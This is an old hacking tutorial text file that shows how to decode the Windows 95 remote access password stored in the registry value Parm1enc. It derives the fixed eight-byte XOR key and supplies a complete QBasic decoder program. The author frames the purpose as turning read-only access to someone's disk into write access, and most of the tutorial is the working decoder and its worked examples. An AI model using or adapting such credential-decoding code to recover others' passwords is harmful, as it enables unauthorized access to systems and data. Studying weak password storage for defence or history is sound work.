

 .---.        .---.                                                                 .----------.
 |    \      /    |    .-.                                                          |          |
 |  |\ \    / /|  |    `-'    .--------.   .-----------.  .---------.  .-------.    |  .-------'
 |  | \ \  / / |  |    .-.    | .------'   `----. .----'  | .-------'  | ,---. |    |  | 
 |  |  \ \/ /  |  |    | |    | |               | |       | |          | |   | |    |  `----.
 |  |   \__/   |  |    | |    \ \               | |       | `----.     | `---' |    |  ,----'
 |  |          |  |    | |     \ `-----.        | |       | ,----'     |  .---'     |  |
 |  |          |  |    | |      `----. |        | |       | |          | , \        |  |
 |  |          |  |    | |           | |        | |       | |          | |\ \       |  |
 |  |          |  |    | |           | |        | |       | |          | | \ \      |  '-------.
 |  |          |  |    | |    .------' |        | |       | '------.   | |  \ \     |          |
 `--'          `--'    `-'    `--------'        `-'       `--------'   `-'   `-'    `----------'


                                  .----------------------. 
                      .-----------|   Proudly Presents   |-----------.
       .--------------+----------------------------------------------+--------------.
       |                            A hacking tutor for:                            |                                                                           |
       |                    The Windows95 remote access password                    |
       `----------------------------------------------------------------------------'


Imagine yourself, you have read-only access to a harddisk. You don't want read-only access, you 
want to change things a little bit ;-)
You know that Remote Access (using netwatch.exe) is enabled, but you don't know the decoded 
password. 
Looks like you have to read this tutor, so get a nice hot cup of tea and get going.

Note: I am not sure if I translated "remote access" correctly, it could also be "remote control"


I have used these programs:

- Windows95 V4.00.950
- Regedit (in your windows directory)
- QBasic V4.5 (you could also use an older version, you'll know when your QBasic is too old ;-)


Getting Started:
In the following text we shall decode the windows95 remote access password. 
I have written a decoder to do so.


Let start!
First we have to find where Windows95 stores the remote access password.
Open regedit.exe and search for admin$, you will end up here:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\ADMIN$

The key Parm1enc(rypted) looks interesting, lets see what happens when we change the password.


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=                            Changing the remote access password                              =-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

First:  go to => start => settings => control panel => network
        click on "sharing files and printers"
        check if "I want to give others access to my files" is enabled
second: go to => start => settings => control panel => security
        click on "remote access"
        change the password to "00000000"

fire regedit and look at Parm1enc, it should say "05 aa 7d 96 63 99 e4 5a"


Note that you have a maximum passwordlength of 8 characters, and that each symbol decoded takes
2 digits coded.
These digits are hexadecimal, you know, 0 1 2 3 4 5 6 7 8 9 a b c d e f 10
If you can't count hexadecimal or binary, get a tut somewhere.

Check out Appendix A for the ASCII codes
The ASCII code for the symbol "0" is 30 heximal, that is 48 decimal and 110000 binary

In some way, the codation routine changes 48 decimal to 5, thus 110000 to 000101.


     110000 <= 1st symbol of our password = "0"
     ?????? <= (de)codation key.   
     ------ <= perform XOR
     000101 <= coded password 

Lets guess that the codation routine performs a XOR command.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=                                   XOR (exclusive or)                                        =-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


    input value a   |   input value b  | output value
    -------------------------------------------------
           1        |         1        |      0
           1        |         0        |      1
           0        |         1        |      1
           0        |         0        |      0

Now lets solve this little problem:

   110000  <= decoded symbol                      110000
   ??????  <= (de)codation key      answer =>     110101
   ------  <= perform XOR                         ------
   000101  <= coded symbol                        000101
                                    
The answer is 110101 binary = 53 decimal
Lets see if this works for other passwords too!
                                    
The value "2" (ASCII, 50 decimal) is encrypted to "07", that is 000111 binary
                                    
  110010  <= 50                    110010
  ??????                answer =>  110101
  ------   perform XOR             ------
  000111  <= 7                     000111

?????? = 110101 = 53!!

Yep, our code WORKS!!!!
Doesn't that feel great?
Now do some practice yourself, do the other symbols.
You can find the answers at the bottom of this text file.


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=                                      Decoding                                               =-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Decoding isn't a problem, because now we know the (de)codation key, I'll show you how to decode.
We have noticed that the first symbol is coded with the key "53". Now guess what
happens when we perform another XOR command:

    000101  <= coded symbol
    110101  <= decodation key
    ------  <= perform XOR
    110000  <= decoded symbol   = 48 decimal = ASCII code "0"  
    
We have DEcoded the 1st symbol!!!!

I have already written a decoder for you. It is written in Microsoft Q(uick)Basic, 
because almost everyone has QBasic (included with MS-DOS), you can get it for free at some sites.
If you want to compile the W95 remote access decoder yourself, cut and paste the program in 
a new document. Then open it with QBasic.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=                                      My decoder                                             =-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


My programs accept the coded password in this form: 05aa7d966399e45a = "00000000"
Here is my QBasic program:


CLS                                       ' clear screen                                   
start:                                    ' label
PRINT "Windows95 remote access decoder"   ' put message on screen
PRINT "Decoder by MisterE"
PRINT
PRINT
PRINT "coded password";
INPUT a$
a$ = UCASE$(a$)                           ' convert password to uppercase
                                          ' this is needed because my program
                                          ' doesn't accept "0f".


lengthcodedpassword = LEN(a$)             ' calculate length of coded password


digit12$ = MID$(a$, 1, 2)                 ' get 1st 2 digits of coded password
digit$ = digit12$
GOSUB determinedecimalnumber              '  / routine to convert hexadecimal
digit12 = digit                           '  \ ASCII string to decimal integer

digit34$ = MID$(a$, 3, 2)                 ' get 3rd and 4th digit
digit$ = digit34$
GOSUB determinedecimalnumber              ' routine
digit34 = digit

digit56$ = MID$(a$, 5, 2)                 ' get 5th and 6th digit
digit$ = digit56$
GOSUB determinedecimalnumber              ' routine
digit56 = digit

digit78$ = MID$(a$, 7, 2)
digit$ = digit78$
GOSUB determinedecimalnumber
digit78 = digit

digit910$ = MID$(a$, 9, 2)
digit$ = digit910$
GOSUB determinedecimalnumber
digit910 = digit

digit1112$ = MID$(a$, 11, 2)
digit$ = digit1112$
GOSUB determinedecimalnumber
digit1112 = digit

digit1314$ = MID$(a$, 13, 2)
digit$ = digit1314$
GOSUB determinedecimalnumber
digit1314 = digit

digit1516$ = MID$(a$, 15, 2)
digit$ = digit1516$
GOSUB determinedecimalnumber
digit1516 = digit





dvalue1 = digit12 XOR 53                  ' /
dvalue2 = digit34 XOR 154                 ' |
dvalue3 = digit56 XOR 77                  ' |   decode coded password
dvalue4 = digit78 XOR 166                 ' |
dvalue5 = digit910 XOR 83                 ' |
dvalue6 = digit1112 XOR 169               ' |
dvalue7 = digit1314 XOR 212               ' |
dvalue8 = digit1516 XOR 106               ' \

a$ = CHR$(dvalue1) + CHR$(dvalue2) + CHR$(dvalue3) + CHR$(dvalue4) + CHR$(dvalue5) + CHR$(dvalue6) + CHR$(dvalue7) + CHR$(dvalue8)
PRINT
PRINT
PRINT

PRINT "decoded password", LEFT$(a$, lengthcodedpassword / 2)
PRINT                    '                 /\
                         '                 ||             
                         ' do not print more than the password length
END

determinedecimalnumber:
FOR loop1 = 0 TO 255
  IF LEFT$(digit$, 1) = "0" THEN             ' check if string starts with 0
    digit$ = RIGHT$(digit$, 1)               ' if so, remove 0
  END IF
  IF HEX$(loop1) = digit$ THEN               ' /  routine to convert
     digit = loop1                           ' |  hexadecimal string to
     loop1 = 255                             ' |  decimal integer
  END IF                                     ' \
NEXT loop1
RETURN


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=================================================================================================
I am not very good at programming, so if you have any comments on how to write a better program,
contact me. One can find me at:

EFNet, #cracking4newbies and #cracking

One may also mail me at MisterE@freemail.nl
       
=================================================================================================
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

 









                             A P P E N D I X   A

                                 ASCII CODES

Control Characters

     00  NUL   null or time fill        10  DLE   data line escape
     01  SOH   start of heading         11  DC1   device control 1
     02  STX   start of text            12  DC2   device control 2
     03  ETX   end of text              13  DC3   device control 3
     04  EOT   end of transmission      14  DC4   device control 4
     05  ENQ   enquiry                  15  NAK   negative acknowledge
     06  ACK   acknowledge              16  SYN   synchronous idle
     07  BEL   bell                     17  ETB   end of transm blocks
     08  BS    backspace                18  CAN   cancel
     09  HT    horizontal tab           19  EM    end of medium
     0A  LF    line feed                1A  SUB   substitute
     0B  VT    vertical tab             1B  ESC   escape
     0C  FF    form feed                1C  FS    file separator
     0D  CR    carriage return          1D  GS    group selector
     0E  SO    shift out                1E  RS    record separator
     0F  SI    shift in                 1F  US    unit separator
                                        7F  DEL   delete

Graphic Characters

          20        30  0     40  @     50  P     60  ` *   70  p
          21  !     31  1     41  A     51  Q     61  a     71  q
          22  "     32  2     42  B     52  R     62  b     72  r
          23  #     33  3     43  C     53  S     63  c     73  s
          24  $     34  4     44  D     54  T     64  d     74  t
          25  %     35  5     45  E     55  U     65  e     75  u
          26  &     36  6     46  F     56  V     66  f     76  v
          27  '     37  7     47  G     57  W     67  g     77  w
          28  (     38  8     48  H     58  X     68  h     78  x
          29  )     39  9     49  I     59  Y     69  i     79  y
          2A  *     3A  :     4A  J     5A  Z     6A  j     7A  z
          2B  +     3B  ;     4B  K     5B  [     6B  k     7B  { *
          2C  ,     3C  <     4C  L     5C  \ *   6C  l     7C  | *
          2D  -     3D  =     4D  M     5D  ]     6D  m     7D  } *
          2E  .     3E  >     4E  N     5E  ^ *   6E  n     7E  ~ *
          2F  /     3F  ?     4F  O     5F  _     6F  o



                        decimal       binary      hexadecimal
                           ||          ||             ||
                           \/          \/             \/



The answers:  1st digit => 53      = 00110101     =   35
              2nd digit => 154     = 10011010     =   9a
              3rd digit => 77      = 01001101     =   4d
              4th digit => 166     = 10100110     =   a6
              5th digit => 83      = 01010011     =   53    
              6th digit => 169     = 10101001     =   a9
              7th digit => 212     = 11010100     =   d4
              8th digit => 106     = 01101010     =   6a

Notice there is some relation between the keys. Figure out the relation yourself.
